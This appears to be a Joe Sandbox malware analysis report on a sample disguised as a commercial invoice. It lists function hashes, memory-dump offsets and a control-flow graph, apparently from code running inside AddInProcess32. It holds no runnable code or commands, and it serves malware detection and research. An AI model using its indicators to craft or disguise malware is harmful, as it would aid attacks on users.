                                              • Instruction Fuzzy Hash: E611A32080CFD549F770AA689055371FBC0DF16338F8805BCC88A826C2CADDB8D6C361
                                              Function 00007FF7C1864AD0 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 782d770d07f0f7f8226f09c8c08221234c90bcf8f8452e81fbbdb26241b918d8
                                              • Instruction ID: 8e39ae90e9a05406e28f03700ac55a02a6352e5ab871b0dadb2e5686b2ae3c43
                                              • Opcode Fuzzy Hash: 782d770d07f0f7f8226f09c8c08221234c90bcf8f8452e81fbbdb26241b918d8
                                              • Instruction Fuzzy Hash: 80F0F021B0C91A0FEBA8EAADB4946B8B6D1EF8833274500BAE40DC7195E994CCD543C0
                                              Function 00007FF7C183AA46 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbb07b79944c7ef5f6e69dc369ad361ea7c622529195f57cf7bd8158fdaf9007
                                              • Instruction ID: 8e2666a8c86a30d19aa17fac5ac1b138d9849b134f6dc042baed739f50e7d49c
                                              • Opcode Fuzzy Hash: fbb07b79944c7ef5f6e69dc369ad361ea7c622529195f57cf7bd8158fdaf9007
                                              • Instruction Fuzzy Hash: 86F0A421B1CD1A4B966CBB1CB4411A9F3D1EF8873079446BFD44EC328BDD69B85342C5
                                              Function 00007FF7C183AB45 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 415d5a73448c162714c855a69fe55278aec472af85d84873d15af048eacc13d1
                                              • Instruction ID: 7d8af81067f673ff416e823fe4f64dda14dc89fc669fcc019846b700f61080ae
                                              • Opcode Fuzzy Hash: 415d5a73448c162714c855a69fe55278aec472af85d84873d15af048eacc13d1
                                              • Instruction Fuzzy Hash: 4DF08121B1CD1A4B966CBB1CA4411A9B3D1EF4833079446BED44EC328BDE69B8534285
                                              Function 00007FF7C183A91E Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74711d72594633d17ef39aa9f1c48183f75df7d553f502d0030b510db36736d4
                                              • Instruction ID: b3cf56d1dd964ea22261929c679ff3b0ec63770e807761e84995d5137c00cae6
                                              • Opcode Fuzzy Hash: 74711d72594633d17ef39aa9f1c48183f75df7d553f502d0030b510db36736d4
                                              • Instruction Fuzzy Hash: 9CF08121B1CD1A4B976CBA0CB4411A9B3D2EF58730794417ED44EC338BDE68B85686C5
                                              Function 00007FF7C1832B78 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fede9dce00e35e8c07c1e599300cca88c5999b1df648172fc5aff28b3c5f079d
                                              • Instruction ID: bb9a578f2669d2d74d80ab05f9bdf3e9d92b54b5d274d55002ca50f22c62a89e
                                              • Opcode Fuzzy Hash: fede9dce00e35e8c07c1e599300cca88c5999b1df648172fc5aff28b3c5f079d
                                              • Instruction Fuzzy Hash: 5601D12081D6D68FD7126B30041A5A5BBE0AF03220BAA05FAE045CF0EBD95D6C168792
                                              Function 00007FF7C184E260 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f484efaed0655ee3fdd48adfeba35ee144fcce8604ef9c1f03908fa82fcb4b8
                                              • Instruction ID: 2b0a071cb980c1d411df6d024eb057e2267097033380d284322ea8502ebc3e3b
                                              • Opcode Fuzzy Hash: 1f484efaed0655ee3fdd48adfeba35ee144fcce8604ef9c1f03908fa82fcb4b8
                                              • Instruction Fuzzy Hash: EFF06D30718E094FE7A8FA6D9494672B2D2FBAC3267A4027DD40DC339ADD69E8438350
                                              Function 00007FF7C183A8B6 Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3105e0b35d74287c3d06ac8419cfceb9567cfe8c4c552b81bed68863c2459649
                                              • Instruction ID: ec269c5a623dac8ddc13e05655b13faefb09174ce2bc35bd1369222ecde4c7c9
                                              • Opcode Fuzzy Hash: 3105e0b35d74287c3d06ac8419cfceb9567cfe8c4c552b81bed68863c2459649
                                              • Instruction Fuzzy Hash: 18F08121F1CD160B9B6DBA08A4414BAF3D1EF4833079445BED04EC32CBCD68B8468285
                                              Function 00007FF7C184FF00 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14942fe769bdf2bad9bfa9e5306af6d4076d283ae9382278d4ea6cebe43a8054
                                              • Instruction ID: fe06ac2584a7f3dd8f13df2b57e2ee06a28c4b5efefd5595ceafea97c37af447
                                              • Opcode Fuzzy Hash: 14942fe769bdf2bad9bfa9e5306af6d4076d283ae9382278d4ea6cebe43a8054
                                              • Instruction Fuzzy Hash: 99F0DA30708C0E8F9BD4FB1CE468A29B3E6EFA932179901B6E40DC7265DE64DC51C791
                                              Function 00007FF7C183AA25 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2df5bd8ca7af4cd7b945499a71ae449cc6ec17c4702a13a29803d9bb3f2d7376
                                              • Instruction ID: a7b9950126e5f6f913a8cfe5cdc625f5c65d3068beea0ad28055451c4702c309
                                              • Opcode Fuzzy Hash: 2df5bd8ca7af4cd7b945499a71ae449cc6ec17c4702a13a29803d9bb3f2d7376
                                              • Instruction Fuzzy Hash: B2F0FF21A1DE5A0B9B2CBA18A4410B9F3D2EF4833079442BFD44EC338BDD68B8428285
                                              Function 00007FF7C183A987 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f759b3f2d2df51def6c15dd8537e52658cdf9c0638da089894f8db0617ea0fe4
                                              • Instruction ID: 1f718036dc3e996db0cf0b9508550d297a3b563285d37b0c38a7833f22b06415
                                              • Opcode Fuzzy Hash: f759b3f2d2df51def6c15dd8537e52658cdf9c0638da089894f8db0617ea0fe4
                                              • Instruction Fuzzy Hash: 96F0A421B1CD1A4B966CFB0CA4411A9B3D1EF88730794457ED05EC328BCE68B85742C5
                                              Function 00007FF7C1833398 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c62492206d195bd414ce7a1ac00297feea4104de85fab82b8e5cf76ff38364e3
                                              • Instruction ID: 3da8715dbb8da002bd39b98fa472a350140d6f7f02670adf7719bab698c44835
                                              • Opcode Fuzzy Hash: c62492206d195bd414ce7a1ac00297feea4104de85fab82b8e5cf76ff38364e3
                                              • Instruction Fuzzy Hash: 08F0283051CA016FE35CAB19844AABAB7D4FBA9361F50002EF08E83293CDB0780187A2
                                              Function 00007FF7C185B110 Relevance: .0, Instructions: 41COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 571312c9afffb96ca493ea60e48d3a2903c6fd1372c8822811a3213a27cdbb2e
                                              • Instruction ID: 58839ceb8dfc9eb51211d1225557fda3964d0a879ea167bc59320485e401f9bc
                                              • Opcode Fuzzy Hash: 571312c9afffb96ca493ea60e48d3a2903c6fd1372c8822811a3213a27cdbb2e
                                              • Instruction Fuzzy Hash: 56F0EC2061CD0E8FEF84FB2DC455964B3E1FF583647A446B8D40EC7292EA56E896CB50
                                              Function 00007FF7C1838199 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51eb5ee8a503b0237d73907e1acb804974fafd46cfa7a18f740a6bff84e41a89
                                              • Instruction ID: a574263553273178630327e0ddefb15d538ba0449ebdfea18f0f74ebe87277fc
                                              • Opcode Fuzzy Hash: 51eb5ee8a503b0237d73907e1acb804974fafd46cfa7a18f740a6bff84e41a89
                                              • Instruction Fuzzy Hash: EF016D3091DBCD4FEB46EF288C581A9BFF0FF55200B8405EBD858C72A2DE7959148741
                                              Function 00007FF7C1832AF5 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8bc3f4452d3aeb0c6ca284ac2cef2e9261fb36a2cce2ae702b5735fef000d6af
                                              • Instruction ID: edb353443c464cc9ad8513cbedb0e98d6116d3d8b16a4178addd7bcf488b0ed1
                                              • Opcode Fuzzy Hash: 8bc3f4452d3aeb0c6ca284ac2cef2e9261fb36a2cce2ae702b5735fef000d6af
                                              • Instruction Fuzzy Hash: A0E02211B1D84653676479AD38892B986C6CFDC2387980133E10CC3287DC88686243A1
                                              Function 00007FF7C185B130 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2e0507d8a784ce1fa8c8d0f17078baa0193fe9bfd9d96ccabc671535742006d
                                              • Instruction ID: 758b34264f5616f55cf4fbe2796289f9754a93f9f8672cf49103b897bdb343e9
                                              • Opcode Fuzzy Hash: f2e0507d8a784ce1fa8c8d0f17078baa0193fe9bfd9d96ccabc671535742006d
                                              • Instruction Fuzzy Hash: 0CF05C3150CE090AF764643A5C54675BFC9DF54271F50013BD449C2191CA99E481C6A0
                                              Function 00007FF7C18322C8 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ef04f3e5c3f910bd88d6b40b4974ff782cdf94155272dde228c0c1b7b3bc456
                                              • Instruction ID: 231080260bc682c63f645debceec4cca90ceaf57976b95546099b531e3f4df23
                                              • Opcode Fuzzy Hash: 7ef04f3e5c3f910bd88d6b40b4974ff782cdf94155272dde228c0c1b7b3bc456
                                              • Instruction Fuzzy Hash: E9F0BE01C1CE6609F7B6756920543BAAAD2DB11230F8816B6DC89C55C1D98CF8E583A1
                                              Function 00007FF7C18518F8 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ade2974eaa8b37484afa1069e8175d1f4eb421dcc9cc41544b095c0c98f3b4a1
                                              • Instruction ID: 2bf61ef16dc446d2786876ea1a49b5a49ff7ebf2c3cc41ff951a2c3b6083690d
                                              • Opcode Fuzzy Hash: ade2974eaa8b37484afa1069e8175d1f4eb421dcc9cc41544b095c0c98f3b4a1
                                              • Instruction Fuzzy Hash: C9E09B31D1DC1546B774792824612F867D1DF86374BE40576D44DC628ACD997C938291
                                              Function 00007FF7C18308CD Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f50e9593e85577cb9ca14380464ae7bbfe2e90e8ebc8ce5f3f0617bbd3f705d
                                              • Instruction ID: 18d805fcf2828551a0eb72ab589d4f3e881c8c6943064c5432a1d7177917ed26
                                              • Opcode Fuzzy Hash: 8f50e9593e85577cb9ca14380464ae7bbfe2e90e8ebc8ce5f3f0617bbd3f705d
                                              • Instruction Fuzzy Hash: A7F0ECA181D7844ED791EB38845D3957ED0AB16218FA800FEC448CF193E6AA44478752
                                              Function 00007FF7C18443F0 Relevance: .0, Instructions: 22COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3f080e4a5a546933f0a4cefa7ac1bef7ac693cdabcf1e99db13bf353afc678c
                                              • Instruction ID: 99cdceb5e1d37f9caa2ad8fbd9c94c76157ba98c6d9c0ce58094ac901691f893
                                              • Opcode Fuzzy Hash: c3f080e4a5a546933f0a4cefa7ac1bef7ac693cdabcf1e99db13bf353afc678c
                                              • Instruction Fuzzy Hash: 28D01221D2CE194FEBB8BA7850452A5A1E0FF18320F800A79D05AC3589DFA8A9958380
                                              Function 00007FF7C1940DA4 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fef51e4c035b13918cbf85215974752d952bd057d47d37a911fea096d66dad1e
                                              • Instruction ID: ef30edf7900b720d6162a3fcc2986427706aa2aba9894e7dc8ac3efdcdb824aa
                                              • Opcode Fuzzy Hash: fef51e4c035b13918cbf85215974752d952bd057d47d37a911fea096d66dad1e
                                              • Instruction Fuzzy Hash: 75E01A30A0462C8EDF60EB48CC41BE9B3B1FB84310F0041E5D44DE3251CB306A84CF42
                                              Function 00007FF7C18516F8 Relevance: .0, Instructions: 1COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 318e5b51855e2e82674233094c6bb4949ac6ac620057b5b743e8686707491224
                                              • Instruction ID: 9a6f2bf55840521663b3644a6a741d2ae7621078e5d2613ced167132f0c207f6
                                              • Opcode Fuzzy Hash: 318e5b51855e2e82674233094c6bb4949ac6ac620057b5b743e8686707491224
                                              • Instruction Fuzzy Hash:
                                              Function 00007FF7C18333C0 Relevance: .0, Instructions: 1COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 50c38656825e2a5ad063a450d2f274d68efd81d768bbef3ae3ea48df4dc07d54
                                              • Instruction ID: 462b9d2f4556b774591b3fbaa757aea38780a454aa43259c1247c25ac7314316
                                              • Opcode Fuzzy Hash: 50c38656825e2a5ad063a450d2f274d68efd81d768bbef3ae3ea48df4dc07d54
                                              • Instruction Fuzzy Hash:

                                              Non-executed Functions

                                              Function 00007FF7C1832608 Relevance: 2.1, Strings: 1, Instructions: 814COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: KK_H
                                              • API String ID: 0-1421535800
                                              • Opcode ID: ebabb6361e130f76b69f1a4a6b9ae6763a66cf041b4261244eb1635e8d136ad4
                                              • Instruction ID: 0fde247db5d1ddfd0abc1c0b06380592f0aae93381b214e49d30da4c5afa9bf3
                                              • Opcode Fuzzy Hash: ebabb6361e130f76b69f1a4a6b9ae6763a66cf041b4261244eb1635e8d136ad4
                                              • Instruction Fuzzy Hash: CE222331A0CE0A4FE759EB2CE8516B5F7D1FF89331B5442BAD44AC3292DE64F8528790
                                              Function 00007FF7C18388FA Relevance: 7.6, Strings: 6, Instructions: 99COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: M_^J$M_^T$M_^^$M_^_$M_^`$M_^i
                                              • API String ID: 0-1093707961
                                              • Opcode ID: 512e40a256bd3c179b0ad83a0be9dbef95e8215b4a72299d8547041cc2876015
                                              • Instruction ID: 3e3e016f864800fb7aadbea61fe9cf4b3b70d25c10442d52693e87962d877e49
                                              • Opcode Fuzzy Hash: 512e40a256bd3c179b0ad83a0be9dbef95e8215b4a72299d8547041cc2876015
                                              • Instruction Fuzzy Hash: 592123B36092248BD7127A9D7C952D9BB90DF923B638903F3C298CF183FD14748686D5

                                              Execution Graph

                                              Execution Coverage:8.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:11
                                              Total number of Limit Nodes:2
                                              execution_graph 11944 65b2f68 11945 65b3270 11944->11945 11946 65b2f90 11944->11946 11947 65b2f99 11946->11947 11950 65b23e4 11946->11950 11949 65b2fbc 11949->11949 11951 65b23ef 11950->11951 11953 65b32b3 11951->11953 11954 65b2400 11951->11954 11953->11949 11955 65b32e8 OleInitialize 11954->11955 11956 65b334c 11955->11956 11956->11953

                                              Executed Functions

                                              Function 02B3CFA8 Relevance: 2.3, Instructions: 2296COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33bcf733d5e81a620037afd46ec5f45d786ada08ea292ae50326e3f61afbecb9
                                              • Instruction ID: 1238ecb41ae4b7cc15676cfd135e0980c9bf1c26f52a5bd8744de8e1062bfa70
                                              • Opcode Fuzzy Hash: 33bcf733d5e81a620037afd46ec5f45d786ada08ea292ae50326e3f61afbecb9
                                              • Instruction Fuzzy Hash: A1331C31D10B198EDB11EF68C8946ADF7B1FF99300F15C69AE458A7211EB70EAC5CB81
                                              Function 02B33E38 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 542 2b33e38-2b33e9e 544 2b33ea0-2b33eab 542->544 545 2b33ee8-2b33eea 542->545 544->545 546 2b33ead-2b33eb9 544->546 547 2b33eec-2b33f44 545->547 548 2b33ebb-2b33ec5 546->548 549 2b33edc-2b33ee6 546->549 556 2b33f46-2b33f51 547->556 557 2b33f8e-2b33f90 547->557 550 2b33ec7 548->550 551 2b33ec9-2b33ed8 548->551 549->547 550->551 551->551 553 2b33eda 551->553 553->549 556->557 558 2b33f53-2b33f5f 556->558 559 2b33f92-2b33faa 557->559 560 2b33f82-2b33f8c 558->560 561 2b33f61-2b33f6b 558->561 566 2b33ff4-2b33ff6 559->566 567 2b33fac-2b33fb7 559->567 560->559 562 2b33f6f-2b33f7e 561->562 563 2b33f6d 561->563 562->562 565 2b33f80 562->565 563->562 565->560 568 2b33ff8-2b34046 566->568 567->566 569 2b33fb9-2b33fc5 567->569 577 2b3404c-2b3405a 568->577 570 2b33fc7-2b33fd1 569->570 571 2b33fe8-2b33ff2 569->571 573 2b33fd3 570->573 574 2b33fd5-2b33fe4 570->574 571->568 573->574 574->574 575 2b33fe6 574->575 575->571 578 2b34063-2b340c3 577->578 579 2b3405c-2b34062 577->579 586 2b340d3-2b340d7 578->586 587 2b340c5-2b340c9 578->587 579->578 589 2b340e7-2b340eb 586->589 590 2b340d9-2b340dd 586->590 587->586 588 2b340cb 587->588 588->586 592 2b340fb-2b340ff 589->592 593 2b340ed-2b340f1 589->593 590->589 591 2b340df-2b340e2 call 2b30ab8 590->591 591->589 594 2b34101-2b34105 592->594 595 2b3410f-2b34113 592->595 593->592 597 2b340f3-2b340f6 call 2b30ab8 593->597 594->595 598 2b34107-2b3410a call 2b30ab8 594->598 599 2b34123-2b34127 595->599 600 2b34115-2b34119 595->600 597->592 598->595 604 2b34137 599->604 605 2b34129-2b3412d 599->605 600->599 603 2b3411b 600->603 603->599 607 2b34138 604->607 605->604 606 2b3412f 605->606 606->604 607->607
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2463575151.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2b30000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V|m
                                              • API String ID: 0-2015827483
                                              • Opcode ID: b4b63c0d77d95c4853c1276c4634f0bfdfe8ca863e6a429bfb03a958acc23df7
                                              • Instruction ID: 7fda03200c22ab0bb23b26c052afcafcc43d599c7294f5f5267d7cb151ac86e6
                                              • Opcode Fuzzy Hash: b4b63c0d77d95c4853c1276c4634f0bfdfe8ca863e6a429bfb03a958acc23df7
                                              • Instruction Fuzzy Hash: 95916A70E002499FDB11CFA9D9817AEBBF2EF88314F148169E405E7294DB749885CB91
                                              Function 02B39D02 Relevance: .7, Instructions: 657COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 674 2b39d02-2b39d43 677 2b39d45-2b39d5e 674->677 678 2b39d6c-2b39d6f 674->678 681 2b39d67 677->681 679 2b39d71-2b39d83 678->679 680 2b39d88-2b39d8b 678->680 679->680 682 2b39ed2-2b39ed5 680->682 683 2b39d91-2b39ecd call 2b39b10 680->683 681->678 685 2b39ed7-2b39edc 682->685 686 2b39edf-2b39ee2 682->686 683->682 685->686 687 2b3a16a-2b3a16d 686->687 688 2b39ee8-2b39f0b 686->688 690 2b3a173-2b3a205 687->690 691 2b3a20a-2b3a20d 687->691 692 2b39f11-2b39fcb 688->692 693 2b3cc67-2b3cc95 688->693 690->691 694 2b3a213-2b3a2a5 691->694 695 2b3a2aa-2b3a2ad 691->695 692->693 715 2b39fd1-2b3a043 692->715 704 2b3cc97-2b3cc9a 693->704 694->695 698 2b3a2e4-2b3a2e7 695->698 699 2b3a2af-2b3a2d1 695->699 705 2b3a4a3-2b3a4a6 698->705 706 2b3a2ed-2b3a2fe 698->706 699->693 721 2b3a2d7-2b3a2df 699->721 712 2b3cca2-2b3cca5 704->712 713 2b3cc9c-2b3cca1 704->713 708 2b3a5ea-2b3a5ed 705->708 709 2b3a4ac-2b3a4bd 705->709 706->693 714 2b3a304-2b3a3ea 706->714 716 2b3a5f3-2b3a685 708->716 717 2b3a68a-2b3a68d 708->717 709->693 720 2b3a4c3-2b3a5ba 709->720 722 2b3cca7-2b3ccad 712->722 723 2b3ccef-2b3ccf1 712->723 714->693 766 2b3a3f0-2b3a473 714->766 715->693 761 2b3a049-2b3a0bb 715->761 716->717 726 2b3a6a0-2b3a6a3 717->726 727 2b3a68f-2b3a69b 717->727 